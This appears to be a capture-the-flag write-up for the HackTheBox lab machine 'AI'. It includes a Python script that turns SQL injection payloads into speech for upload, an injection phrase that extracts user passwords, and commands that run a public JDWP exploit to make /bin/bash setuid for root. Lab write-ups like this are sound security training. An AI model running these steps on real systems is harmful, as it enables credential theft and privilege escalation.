AI @ HackTheBox • Vulndev

25JanJanuary 25, 2020

AI @ HackTheBox

By xct CTF hackthebox, java debugging, linux, sql injection, voice

AI is a 30 point machine on HackTheBox that involves SQL injection via speech and abusing an exposed java debugging port.

Notes

SQL injection helper:

#!/usr/bin/env python
import subprocess
import requests
import shutil
import json
import sys
import re

msg = sys.argv[1]

# text to speech
headers = {'Content-type' : 'application/x-www-form-urlencoded'}
url = 'https://ttsmp3.com/makemp3_new.php'
r = requests.post(url, data={'msg': msg, 'lang':'Joey','source':'ttsmp3'}, headers=headers)

# download result
url = json.loads(r.text)['URL']
r = requests.get(url, stream=True)
with open('tmp.mp3', 'wb') as f:
    shutil.copyfileobj(r.raw, f)

# convert
subprocess.call(['ffmpeg', '-i', 'tmp.mp3',
                   'tmp.wav'])

# upload & check result
url = 'http://ai.htb/ai.php'
files = {'fileToUpload': open('tmp.wav','rb')}
r = requests.post(url, files=files, data={'submit':'Process It!'})
print(r.text)

Use helper to get the users password:

python3 inject.py 'open single kwote. union select password from users comment database'

Exploit jdwp (with port forwarded to localhost):

searchsploit -x jdwp
searchsploit -m exploits/java/remote/46501.py
python 46501.py -t localhost -p 8000 --cmd "chmod u+s /bin/bash"
curl http://127.0.0.1:8005
/bin/bash -p

Author

xct

Related Posts

06JulJuly 6, 2019

Hackback @ HackTheBox

This post is about hackback, a really interesting and challenging machine that was released on 23.02.19 on hackthebox.eu. Techniques used... read more

28AugAugust 28, 2021

PHP Zerodium Backdoor & Sudo Knife – Knife @Hack The Box

This video is about Knife, a 20-point machine on HackTheBox that involves the zerodium php backdoor and using "sudo knife"... read more

02JunJune 2, 2020

P.O.O. Endgame @ HackTheBox

P.O.O. Endgame is one of HackTheBox’s endgame labs and was just retired. It involves exploiting SQL Server Links & Active... read more

04SepSeptember 4, 2021

Command Injection, Prototype Pollution & Kubernetes – Unobtainium @ HackTheBox

This video is about Unobtainium, a 40-point Linux machine on HackTheBox. For user, we download an electron app and proxy... read more

16DecDecember 16, 2019

TMHCxHTB Matrix Madness

Using the hill cipher cracking theorem to solve the ctf challenge. read more

17JulJuly 17, 2021

LFI to RCE, Sticky Notes & SQLi – Breadcrumbs @ HackTheBox

We are solving Breadcrumbs, a 40-point Windows machine on HackTheBox. For user, we exploit an LFI to read PHP source... read more

28MarMarch 28, 2020

Sniper @ HackTheBox

Sniper is a 30-point machine on HackTheBox that involves abusing a remote file inclusion and uploading a crafted chm file... read more

05DecDecember 5, 2021

Stealing Hashes with Responder, GPO Permissions & Unintended Ways – Vault @ PG Practice

We are solving Vault from PG Practice. This machine involves planting malicious files on an SMB share to steal hashes.... read more

06JunJune 6, 2020

Nest @ HackTheBox

Nest is a 20-point Windows machine on HackTheBox that involves searching through smb shares and analyzing 2 short custom programs. read more

17SepSeptember 17, 2022

SQLi, LFI to RCE and Unintended Privesc via XAMLX & Impersonation – StreamIO @ HackTheBox

Video & additional notes for StreamIO, a medium difficulty Windows machine on HackTheBox that involves manual MSSQL Injection, going from... read more